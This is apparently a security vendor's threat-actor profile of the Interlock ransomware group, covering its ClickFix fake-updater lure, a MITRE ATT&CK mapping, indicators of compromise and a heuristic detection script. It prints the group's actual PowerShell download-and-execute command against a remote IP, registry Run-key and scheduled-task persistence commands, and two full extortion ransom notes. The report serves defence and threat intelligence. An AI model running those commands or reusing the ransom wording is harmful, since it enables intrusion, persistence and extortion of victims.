Threat Actor Profile: Interlock Ransomware


Executive Summary

A relatively new ransomware group, Interlock, has gained traction in 2025 as an opportunistic ransomware operator that leverages compromised websites and multi-stage social engineering techniques to deliver their payloads.

First observed in September 2024, Interlock departs from the traditional Ransomware-as-a-Service (RaaS) model, operating without affiliates or public advertisements. The financially-motivated group conducts opportunistic double extortion campaigns, relying on a private infrastructure and a custom leak site—Worldwide Secrets Blog—to pressure victims with the threat of publicly exposing sensitive data.

In this blog, we’ll examine Interlock’s most common attack methods and provide tips on how to protect your organization.

Key Points

  • Interlock is an opportunistic ransomware actor, known for obtaining initial access via compromised websites and social engineering techniques.
  • In August 2025, Interlock claimed responsibility for the July 2025 ransomware attack against the City of St. Paul, Minnesota.
  • Interlock makes frequent use of the “ClickFix” technique, where unwitting targets are sent to compromised websites and asked to “prove they are human” by pressing keys that (unbeknownst to them) cause their device to download malware such as remote access trojans (RATs).
  • Interlock carries out double extortion attacks, first exfiltrating then encrypting data. Targets who do not pay the ransom are posted on their leak site, typically with the name of the victim, amount of data stolen, number of files and folders, and a link to the victim’s website (if applicable).

What is Interlock Ransomware?

The Interlock ransomware group (also known as Nefarious Mantis) was first observed in September 2024 and has emerged as a high priority threat in recent months. Over the past 11 months, they have targeted businesses and critical infrastructure sectors across North America and Europe, including education, healthcare, technology, and government entities. In June 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and FBI warned of increased Interlock ransomware activity.

The group is financially motivated, and according to the FBI, is opportunistic when selecting targets. Unlike many modern ransomware groups, Interlock does not follow a typical RaaS model and likely operates as a closed group.

Historically, Interlock ransomware has obtained initial access via drive-by downloads from compromised legitimate websites, an infection chain not typically associated with ransomware actors. In May 2025, the group added the ClickFix social engineering technique to their arsenal.

Interlock’s encryption payload is typically deployed across virtual machines, leaving hosts, workstations, and physical servers unaffected.

Open-source reporting has detailed similarities between the Rhysida and Interlock ransomware variants. CISA’s advisory on Rhysida can be found here. There is evidence to suggest that Interlock may have emerged as a spinoff group from Rhysida, although this has not been definitively proven to date.

Recent Interlock Attacks

On July 22, 2025, CISA and the FBI in combination with other federal agencies issued a joint advisory warning that Interlock had recently upgraded its malware, making it more resistant to detection. The advisory cautioned that the FBI had “encountered Interlock ransomware encryptors designed for both Windows and Linux operating systems,” and that these encryptors have been observed encrypting virtual machines (VMs) across both operating systems.

To date, at least 58 known victims have been posted to Interlock’s leak site. The highest-impact attack to date was the DaVita breach in April 2025, in which 1.5 terabytes of data were stolen, affecting 200,000+ patients of the kidney dialysis service provider.

On August 11, 2025, Interlock claimed responsibility for the July 2025 ransomware attack on the city of St. Paul, Minnesota, which took key city systems offline and put the personal data of 3,500 city employees potentially at risk. Ten days prior to the attack, cyber threat intelligence company PRODAFT claimed they had detected Interlock pre-attack activity in the city’s systems, warning on X (formerly Twitter) that this activity had a “certain likelihood of spreading.” The city has since confirmed the attack was perpetrated by Interlock, but stated it did not pay the ransom demand.

In a recent interview with Fox 9 Minneapolis-St. Paul news (KMSP-TV), Arctic Wolf® President of Technology and Services Dan Schiappa spoke about how the St. Paul attack could have occurred.

“Typically, these ransomware groups try and go after infrastructure [because] they get the most ransomware dollars out of that. This is typically something that a hacking group would do reconnaissance on – they understand the value of the data. They would find the weak points in the ecosystem, then once they’ve gathered all that information, they launch the campaign. We have to take these types of attacks very seriously.”

Interlock Attack Chain Analysis

To gain an initial foothold, the Interlock ransomware group follows the increasingly common approach of combining stealthy, user-initiated infection chains with living-off-the-land (LOTL) techniques. Variations on this technique, including ClickFix and FileFix, typically use legitimate activity to mask malicious behavior, aiming to evade traditional endpoint detection solutions and network monitoring tools.

One of the reasons why this type of threat activity is so effective is that the malicious instructions are hosted on compromised websites that are often already trusted by victims, making them more likely to follow through on installing the malware when prompted.

Initial Access

Interlock employs deceptive tactics to deliver its initial payloads, most notably via the use of fake software updaters hosted on compromised websites. These are crafted using PyInstaller to mimic legitimate software like Google Chrome or Microsoft Edge.

When a user manually follows the instructions shown on one of these fake update websites, a legitimate installer for Chrome or Edge runs as a decoy, while a malicious PowerShell script is silently run in the background. The script acts as a first-stage backdoor, persistently communicating with command-and-control (C2) servers, gathering detailed system information, and enabling follow-on activity.

This is a social engineering technique commonly referred to as ClickFix, which relies on users being tricked by threat actors into running malicious commands, often under the pretext of updating existing software. False dialog boxes instruct the user to use popular Windows shortcuts such as “Windows + R” (run) then “CTRL + V” (paste) to unwittingly paste and run harmful PowerShell commands, thus circumventing traditional security defenses and compromising their own systems.

The use of this ClickFix technique has been observed in several other malware campaigns, including those by Lumma Stealer (aka LummaC2 stealer), AsyncRAT, DanaBot, and DarkGate.

Figure 1: ClickFix fake updater dialog prompts users to manually execute PowerShell command.
(Source: Sekoia.io)

Execution and Obfuscation

Once manually executed by victims, the PowerShell backdoor operates stealthily, running in the background by relaunching itself in a detached mode to avoid detection by the user. It continuously polls remote hosts using HTTP requests, with fallback mechanisms between domains and IP addresses.

A significant amount of variation has been observed among the PowerShell commands executed in recent ClickFix social engineering campaigns, which often employ techniques to evade detections that rely on string matching. Obfuscation techniques include the use of character codes, plus characters, caret characters, and asterisk characters. Most often, these commands make use of built-in download and execution functions like Invoke-RestMethod, Invoke-Expression, and their corresponding aliases. The URLs in these commands point to malicious domains, to legitimate domains used maliciously such as trycloudflare.com, or directly to IPv4 addresses.

The backdoor collects data such as system information, user privileges, running processes, services, and network configuration, which it obfuscates and compresses before exfiltrating to a designated C2 endpoint. The C2 can then issue commands, including delivering executable or DLL payloads, which are decoded and saved locally. Interlock has historically used multiple tools, including Cobalt Strike, Interlock RAT, NodeSnake RAT, and SystemBC for C2 communication and command execution.

PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w %% 16); [int64]$v))"

Figure 2: Example of a malicious PowerShell script, which victims are tricked into executing.

Persistence is established in later script versions (up to v11) through Windows registry keys, and the script can receive and execute arbitrary commands from the threat actor.

All known C2 infrastructure used by this backdoor abuses Cloudflare’s “TryCloudflare” tunneling tool, using dynamically generated subdomains to obfuscate traffic and evade traditional detection methods. Developers commonly use TryCloudflare to experiment with Cloudflare Tunnel without adding a site to Cloudflare’s DNS, but it has been used in the past to deliver malware. These dynamic and ephemeral domains appear legitimate and act as temporary proxies, making it more difficult to trace or block malicious communication.

This misuse of trusted platforms highlights a growing trend among more sophisticated actors to blend in with legitimate services, challenging defenders’ ability to distinguish malicious traffic from benign.
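The loader traits described above (a hidden window, iex/irm download cradles, char-code and string-concatenation obfuscation, raw-IP and trycloudflare.com URLs, and explorer.exe as the parent of a Win+R launch), together with the Run-key persistence shape listed under System Artifacts below, can be turned into a triage check over process-creation and registry data. The following Python is an added example, not Arctic Wolf tooling; the TEST-NET address, the user name, the TryCloudflare label and every sample event in it are constructed.

```python
"""Heuristic triage of process-creation events and HKCU Run values for the
ClickFix PowerShell loader pattern in this profile. Added example, not Arctic
Wolf tooling; every sample below is constructed (TEST-NET address, made-up
user 'jdoe', made-up TryCloudflare label)."""
import re

# Download-and-execute cmdlets and the aliases the article names.
CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|"
                       r"invoke-webrequest|downloadstring)\b", re.IGNORECASE)
# -w h, -w hidden, -windowstyle hidden and -w 1 all suppress the console window.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:h(?:idden)?|1)\b", re.IGNORECASE)
# Raw IPv4 host (optional scheme and port) used directly as the download URL.
IPV4_URL_RE = re.compile(r"(?:https?://)?\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/")
TRYCF_RE = re.compile(r"[\w-]+\.trycloudflare\.com", re.IGNORECASE)
CHARCODE_RE = re.compile(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", re.IGNORECASE)
# Short quoted fragments glued with '+' ('i'+'r'+'m') defeat plain string matching.
PLUS_CONCAT_RE = re.compile(r"['\"][^'\"]{1,3}['\"]\s*\+\s*['\"]")
CHECKS = [("hidden_window", HIDDEN_RE), ("download_cradle", CRADLE_RE),
          ("ipv4_url", IPV4_URL_RE), ("trycloudflare_domain", TRYCF_RE),
          ("charcode_obfuscation", CHARCODE_RE),
          ("string_concat_obfuscation", PLUS_CONCAT_RE)]
STRONG = {"hidden_window", "ipv4_url", "trycloudflare_domain",
          "charcode_obfuscation", "string_concat_obfuscation", "caret_obfuscation"}

def triage_process(parent_image: str, cmdline: str) -> dict:
    """Indicators matched by one process-creation event, plus a verdict."""
    hits = [name for name, rx in CHECKS if rx.search(cmdline)]
    if cmdline.count("^") >= 3:  # cmd-level caret insertion
        hits.append("caret_obfuscation")
    # A command pasted into the Win+R dialog runs as a child of explorer.exe,
    # the parent an interactive ClickFix victim produces.
    if parent_image.lower().endswith("explorer.exe"):
        hits.append("parent_explorer")
    # A cradle alone is everyday admin activity; a cradle plus window hiding,
    # obfuscation or a raw-IP / TryCloudflare URL is the loader shape.
    return {"suspicious": "download_cradle" in hits and bool(STRONG & set(hits)),
            "hits": hits}

INTERPRETERS = ("node.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe")
SCRIPT_EXTS = (".ps1", ".js", ".vbs", ".hta")

def triage_run_value(name: str, data: str) -> dict:
    """Flag a Run value that starts an interpreter from a user-writable profile
    path (node.exe under AppData\\Roaming running a .log, per System Artifacts)."""
    low, hits = data.lower(), []
    if "\\appdata\\roaming\\" in low or "\\appdata\\local\\temp\\" in low:
        hits.append("user_writable_path")
    exe = next((i for i in INTERPRETERS if i in low), None)
    if exe:
        hits.append(f"interpreter:{exe}")
        # The file handed to the interpreter should carry a script extension;
        # a .log argument is the disguise documented in the artifacts table.
        args = low.split(exe, 1)[1].replace('"', "").split()
        if args and not args[-1].endswith(SCRIPT_EXTS):
            hits.append("non_script_extension")
    if re.search(r"(?<=[a-z])[01]|[01](?=[a-z])", name.lower()):
        hits.append("digit_lookalike_name")  # vendor lookalikes such as 0neDrive
    return {"suspicious": "user_writable_path" in hits and exe is not None,
            "hits": hits}

# Constructed samples: two ClickFix-style launches, two benign ones, two Run values.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe",
     'PowerShell.exe -w h -c "iex $(irm 203.0.113.10:8080/1733000000)"'),
    (r"C:\Windows\explorer.exe",
     "powershell -windowstyle hidden -c \"$a='i'+'r'+'m'; "
     "iex (&$a https://alpha-beta-gamma.trycloudflare.com/x)\""),
    (r"C:\Windows\System32\cmd.exe",
     'powershell -c "Get-Service | Where-Object Status -eq Running"'),
    (r"C:\Program Files\ConfigMgr\ccmexec.exe",
     r"powershell -ExecutionPolicy Bypass -File C:\Windows\CCM\inventory.ps1"),
]
SAMPLE_RUN_VALUES = [
    ("ChromeUpdater",
     r'"C:\Users\jdoe\AppData\Roaming\node-v22.11.0-win-x64\node.exe" '
     r"C:\Users\jdoe\AppData\Roaming\node-v22.11.0-win-x64\p16iir70.log"),
    ("OneDrive", r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

def scan_samples() -> dict:
    """Run both triage functions over the constructed samples."""
    return {"processes": [triage_process(p, c) for p, c in SAMPLE_EVENTS],
            "run_values": [triage_run_value(n, d) for n, d in SAMPLE_RUN_VALUES]}

if __name__ == "__main__":
    for kind, results in scan_samples().items():
        for r in results:
            print(kind, "SUSPICIOUS" if r["suspicious"] else "benign", r["hits"])
```

The verdicts are heuristics tuned so that a bare download cradle from an admin console is only noted, not escalated; the thresholds should be adjusted against your own process baseline.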

Detection Evasion

Recent observations confirm that Interlock has incorporated a custom PowerShell-based remote access trojan (RAT) into its initial access toolkit, delivered via fake software updaters hosted on compromised websites. The PowerShell RAT operates persistently in detached mode without a visible window, collecting detailed host data and enabling remote command execution and payload delivery.

Figure 3: Interlock’s leak site, “Worldwide Secrets Blog”.

Figure 4: On August 11, 2025, the City of Saint Paul was officially listed on Interlock’s leak site. 

How Arctic Wolf Protects Its Customers

When active campaigns are identified, we move quickly to protect our customers. Arctic Wolf Labs has leveraged threat intelligence around Interlock’s activity to implement new detections in the Arctic Wolf® Aurora™ Platform.

As we discover new information, we will enhance our detections to account for additional IOCs and techniques leveraged by this threat group.

Our Commitment to the Fight Against Ransomware

Arctic Wolf is committed to the fight against ransomware, and as such we are proud to stand alongside the 68 members of the International Counter Ransomware Initiative (CRI), the world’s largest international cyber partnership. As a global leader in security operations, Arctic Wolf’s mission is to help protect governments, businesses, and safety-critical institutions of all sizes from cyber threats.

We’re delighted to have been selected to co-chair the CRI’s new Public-Private Sector Advisory Panel, led by Public Safety Canada, which establishes a trusted set of private sector partners for CRI members to rely on when responding to ransomware attacks.

We look forward to collaborating with CRI members in combating ransomware by catalyzing effective information sharing, building trust through clear expectations and person-to-person collaboration, and developing best practices to navigate practical hurdles to combating ransomware.

Conclusion

Though Interlock is not the newest ransomware group in the threat landscape, its steady rise to prominence over the course of 2025 means that organizations should take heed of CISA’s warnings and implement their mitigation suggestions, which are outlined in our Recommendations section below.

The proliferation of the Interlock RAT malware delivered through compromised websites earned the group enough notoriety to warrant a warning from CISA and the FBI in June; the group’s most recent attack on the City of Saint Paul represents a direct escalation of this trend. It indicates the group is becoming confident enough in its activities to go after targets it feels can pay out higher-dollar ransom demands, even if that means endangering vital city infrastructure.

From a defensive standpoint, Arctic Wolf will continue to actively monitor this group for further cybersecurity threats. Financially driven groups like Interlock value impact and disruption as their main goals, with few qualms in targeting both private and government entities in the hopes of securing a large payout. It’s highly likely the group will continue targeting high-profile organizations for financial gain in the coming months.

Recommendations

While user training to help employees detect the red flags of a social engineering attack is a good place to start mitigating this threat, the reality is that even the most security-conscious users can, and do, fall victim to these types of attacks.

To provide a solid baseline of security against the type of attacks perpetrated by opportunistic threat actors like Interlock, the following recommendations from CISA will go a long way in defending your organization:

  • Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and by training users to spot phishing attempts.
  • Block tunneling tools and domains related to services such as TryCloudflare in environments where they are not used for operational purposes.
  • Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.
  • Segment networks wherever possible to restrict lateral movement from initially infected devices to other devices in the same organization.
  • Implement identity, credential, and access management (ICAM) policies across the organization.
  • Have an incident response (IR) plan ready, and ensure you have an incident response group that you can reach out to or activate should the need arise.
  • Deploy an Endpoint Detection and Response (EDR) platform: EDR can uncover hidden red flags of intrusion and can even prevent attackers from gaining an initial foothold in the first place. Consider implementing enterprise solutions such as Arctic Wolf® Aurora™ Endpoint Defense.
  • Require multi-factor authentication (MFA) for all services, particularly for webmail, VPN, and accounts that access critical systems.
  • Check out our recommendations on how to defend your organization against Interlock’s FileFix delivery method in our latest blog.

Threat Actor Summary

Threat Actor
  • Interlock ransomware (aka Nefarious Mantis)
Target Locations
  • North America (United States, Canada, Mexico)
  • Europe
  • Australia
Targeted Sectors
  • Manufacturing
  • Hospitality
  • Education
  • Government
  • Financial
  • Healthcare
  • Technology
Infrastructure Used
  • TryCloudflare
  • Compromised domains
Actor Motivation
  • Financial gain
  • Access to sensitive information for financial extortion


Detailed MITRE ATT&CK® Mapping

| Tactic | Technique | Sub-Technique | Procedure |
|---|---|---|---|
| Initial Access | T1204.002 – User Execution | Malicious File | Victims are tricked into downloading and executing fake software updaters hosted on compromised websites. |
| Execution | T1059.001 – Command and Scripting Interpreter | PowerShell | A malicious PowerShell script is executed alongside a legitimate installer when the fake updater is launched by the user. |
| Persistence | T1547.001 – Registry Run Keys/Startup Folder | Registry Key Modification | The PowerShell RAT creates a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence. |
| Privilege Escalation | T1033 – System Owner/User Discovery | | Script collects user context (SYSTEM, Admin, User) using WindowsIdentity commands. |
| Discovery | T1082 – System Information Discovery | | Collects system information via systeminfo. |
| Discovery | T1057 – Process Discovery | | Uses tasklist /svc to enumerate running processes and services. |
| Discovery | T1007 – System Service Discovery | | Uses Get-Service to enumerate active services. |
| Discovery | T1083 – File and Directory Discovery | | Uses Get-PSDrive to enumerate available drives. |
| Discovery | T1016 – System Network Configuration Discovery | | Uses arp -a to gather ARP table/network info. |
| Command and Control | T1071.001 – Application Layer Protocol | Web Protocols | Communicates with C2 via HTTP POST requests to /init1234. |
| Command and Control | T1095 – Non-Application Layer Protocol | | Uses fallback between domain and direct IP addresses for communication redundancy. |
| Defense Evasion | T1140 – Deobfuscate/Decode Files or Information | | Exfiltrated data is XOR-encoded and Gzip-compressed before being sent to the C2 server. |
| Defense Evasion | T1027 – Obfuscated Files or Information | | Uses encoding (XOR), compression (Gzip), and subdomain abuse of trycloudflare to evade detection. |
| Defense Evasion | T1218.011 – System Binary Proxy Execution | Rundll32 | Executes downloaded DLL payloads using rundll32. |
| Defense Evasion | T1562.001 – Impair Defenses | Disable or Modify Tools | PowerShell script attempts to avoid visual execution by relaunching itself in detached mode to remain hidden from the user. |
| Collection | T1005 – Data from Local System | | Collects detailed host information including user, services, processes, network config, and drive data. |
| Execution | T1059 – Command and Scripting Interpreter | | Later versions support execution of arbitrary Windows commands received from the C2 server. |
| Persistence | T1053.005 – Scheduled Task/Job | Scheduled Task | (Implied from registry-based startup behavior; scheduled execution could be an alternative method in future variants.) |


Indicators of Compromise (IOCs)

System Artifacts

| Host Artifact | Details | Source |
|---|---|---|
| PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w %% 16); [int64]$v))" | | Arctic Wolf |
| reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"ChromeUpdater\" /t REG_SZ /d \"C:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\node.exe C:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\p16iir70.log\" /f\" | Registry Key Used to Establish Persistence | Arctic Wolf |
| schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /C cd %s && %s" /st 20:00 /ru system > nul | Scheduled Task | Arctic Wolf |
| C:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\node[.]exe | | Arctic Wolf |
| HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v 0neDrive /t REG_SZ /d | Registry Key | Arctic Wolf |
| HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"ChromeUpdater\ | Registry Key | Arctic Wolf |

Interlock Ransom Notes

Initial Ransom Note

Filename: !__README__!.txt

INTERLOCK – CRITICAL SECURITY ALERT

To Whom It May Concern,
Your organization has experienced a serious security breach. Immediate action is required to mitigate further risks.
Here are the details:

THE CURRENT SITUATION
– Your systems have been infiltrated by unauthorized entities.
– Key files have been encrypted and are now inaccessible to you.
– Sensitive data has been extracted and is in our possession.

WHAT YOU NEED TO DO NOW
1. Contact us via our secure, anonymous platform listed below.
2. Follow all instructions to recover your encrypted data.

Access Point:
Use your unique Company ID: [REDACTED]

DO NOT ATTEMPT:
– File alterations: Renaming, moving, or tampering with files will lead to irreversible damage.
– Third-party software: Using any recovery tools will corrupt the encryption keys, making recovery impossible.
– Reboots or shutdowns: System restarts may cause key damage. Proceed at your own risk.

HOW DID THIS HAPPEN?
We identified vulnerabilities within your network and gained access to critical parts of your infrastructure. The following data categories have been extracted and are now at risk:
– Personal records and client information
– Financial statements, contracts, and legal documents
– Internal communications
– Backups and business-critical files
We hold full copies of these files, and their future is in your hands.

YOUR OPTIONS
#1. Ignore This Warning:
– In 96 hours, we will release or sell your sensitive data.
– Media outlets, regulators, and competitors will be notified.
– Your decryption keys will be destroyed, making recovery impossible.
– The financial and reputational damage could be catastrophic.

#2. Cooperate With Us:
– You will receive the only working decryption tool for your files.
– We will guarantee the secure deletion of all exfiltrated data.
– All traces of this incident will be erased from public and private records.
– A full security audit will be provided to prevent future breaches.

FINAL REMINDER
Failure to act promptly will result in:
– Permanent loss of all encrypted data.
– Leakage of confidential information to the public, competitors, and authorities.
– Irreversible financial harm to your organization.

CONTACT US SECURELY
1. Install the TOR browser via [REDACTED]
2. Visit our anonymous contact form at [REDACTED]
3. Use your unique Company ID: [REDACTED]
4. Review a sample of your compromised data for verification.
5. Use a VPN if TOR is restricted in your area.


“Final Warning” Ransom Note

Filename: FIRST_READ_ME.txt

Final Warning: Your Data Is at Risk
To the Leadership of Your Organization
We have encrypted your systems and extracted sensitive information from your network. Your organization’s failure to prioritize cybersecurity has left critical data vulnerable, and now, the consequences are at hand.

What You Need to Know:
1. We have seized key documents, customer information, and confidential business data.
2. Access to these files has been locked with advanced encryption.
3. Responsibility for this breach lies with your organization, as you are obligated by law to protect Non-Public Information (NPI).

Legal and Financial Risks:
If you fail to act within 72 hours, we will begin publishing your data on our leak platforms. The consequences will include:
– Violations of laws such as [REDACTED].
– Severe fines for non-compliance and lawsuits from affected parties.
– Long-term reputational damage to your business, leading to client and partner losses.

Your Actions:
To prevent escalation, you must cooperate immediately.

1. Access our Recovery Platform via TOR Browser: [REDACTED]
– Download TOR from [REDACTED]
– Open: [REDACTED]
– Use your Organization ID to create a private negotiation chat.

2. Alternative Access for Regular Browsers:
– Open Chrome, Edge, or Firefox.
– Navigate to: [REDACTED]
– Enter your Organization ID for instructions.

Important Warning:
– Do not attempt self-recovery; it will fail and lead to data corruption.
– Avoid engaging third-party negotiators or law enforcement; this will void any possibility of resolution.
– Remember, the data we hold could be used by regulators, competitors, or even the media, causing irreparable harm to your business.

Time is of the essence. Every hour of inaction increases the likelihood of devastating consequences. Make the right decision secure your future by cooperating with us now.


About the Authors

Arctic Wolf Threat Research

The Arctic Wolf Threat Research team actively investigates attacks and vulnerabilities to help our customers detect, mitigate, and respond to them, as well as increase their cybersecurity awareness. Arctic Wolf Threat Research brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.

Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.


